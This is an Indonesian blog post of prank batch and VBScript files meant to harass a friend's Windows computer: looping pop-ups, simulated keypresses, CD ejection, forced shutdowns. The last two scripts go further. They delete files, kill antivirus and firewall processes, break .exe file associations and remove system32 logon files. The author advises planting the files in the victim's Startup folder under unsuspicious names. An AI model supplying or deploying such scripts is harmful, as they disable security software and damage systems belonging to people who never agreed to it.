Kumpulan Script Jahil

Posted: 11 Juli 2012 in Unik

Kumpulan script jahil yang dijamin akan bikin kesal

Saya ada script jahil nih yg mau saya share dengan sobat blog. Intinya ini hanya untuk mengerjai komputer teman kamu, pasti dia kesal banget dan bisa aja menjadi marah monitornya di banting… hahahaha. Script ini kamu buat melalui Notepad dan harus kamu simpan dengan menggunakan ekstensi yang saya sebutkan. Oke deh segera cek script jahil ini.

script ini bisa kta pakai, untuk
menjahili komputer anak org !!
yg harus kamu siapkan adlh :

  1. Notepad
  2.  kopi
  3. pasta
  4. alias kopas
  5. Bersiap2 menerima dosa… hahaha (kidding)

stelah smuax siap,, kupas (mksdx copas) script di bawah ke dalam notepad !!

1. MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS

Code:

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo, cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

==> save nama script diatas dg ekstensi *.bat

2. BIKIN SHUTDOWN + MESSAGES

Code:

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"

==> save nama script diatas dg ekstensi *.bat

3. MAININ TOMBOL CAPS LOCK

Code:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
 do
 wscript.sleep 100
 wshshell.sendkeys “{CAPSLOCK}”
loop
==> save nama script diatas dg ekstensi *.vbs

4. BUKA TUTUP CD/DVD SECARA OTOMATIS

Code:

Set oWMP = CreateObject(“WMPlayer.OCX.7?)
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
loop

==> save nama script diatas dg ekstensi *.vbs

5. MENEKAN TOMBOL ENTER TERUS MENERUS

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

==> save nama script diatas dg ekstensi *.vbs

6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

Code:

MsgBox “Lets Rumble”
 Set wshShell =wscript.CreateObject(“WScript.Shell”)
 do
 wscript.sleep 100
 wshshell.sendkeys “{bs}”
loop
==> save nama script diatas dg ekstensi *.vbs

7. OTOMATIS NGETIK “LU JELEK BANGET SIH” DI NOTEPAD ATAU M.WORD

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop

==> save nama script diatas dg ekstensi *.vbs

8. MEMBUKA NOTEPAD TERUS MENERUS

Code:

@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

==> save nama script diatas dg ekstensi *.bat

9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”

Code:

WScript.Sleep 180000
 WScript.Sleep 10000
 Set WshShell = WScript.CreateObject(“WScript.Shell”)
 WshShell.Run “notepad”
 WScript.Sleep 100
 WshShell.AppActivate “Notepad”
 WScript.Sleep 500
 WshShell.SendKeys “Ka”
 WScript.Sleep 500
 WshShell.SendKeys “mu ”
 WScript.Sleep 500
 WshShell.SendKeys “, je”
 WScript.Sleep 500
 WshShell.SendKeys “l ek”
 WScript.Sleep 500
 WshShell.SendKeys “am ”
 WScript.Sleep 500
 WshShell.SendKeys “at”
 WScript.Sleep 500
 WshShell.SendKeys “ya ”
 WScript.Sleep 500
 WshShell.SendKeys “P er”
 WScript.Sleep 500
 WshShell.SendKeys “ma k”
 WScript.Sleep 500
 WshShell.SendKeys “tuh”
 WScript.Sleep 500
 WshShell.SendKeys ” mu”
 WScript.Sleep 500
 WshShell.SendKeys “ka”
 WScript.Sleep 500
WshShell.SendKeys “hohoho “

==> save nama script diatas dg ekstensi *.vbs

10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

Code:

@echo off
title quiz hari ini

:)

:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

==> nah script diatas save jadi quiz.bat, lalu kasih ke anak orang… agagagagagag……..

11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU :D

Code:

@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”

==> save script diatas dg ekstensi *.bat

Dari semua script diatas, cara menjalankannya adalah degan mengklik 2x file yang kita buat dari notepad tadi. Saya sarankan kalau mau mengusili komputer teman dan bisa dijalankan secara otomatis, kopi file script yg udah kamu simpan ke folder startup di Menu Start. Setelah itu kamu saya sarankan selama seminggu gak nongol biar gak di lempar sama monitor…. hahahaha

Waktu menyimpan dengan ekstensi *.bat atau *.vbs

Ganti * menjadi nama file, misal usil.bat atau ancur.vbs

Saya sarankan buat nama file yang tidak mencurigakan si pengguna komputer.

source

Iklan
Komentar
  1. Perhaps there is some thing not right with the site? The images on the topmost look a little messed up. Nice blog post nevertheless, continue the great work you are doing here!

  2. Belmira berkata:

    wow, nice page, very informative, i learned a lot…thanks for that information. keep it up.http://www.acertemail.com

Beri Komentar Disini

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s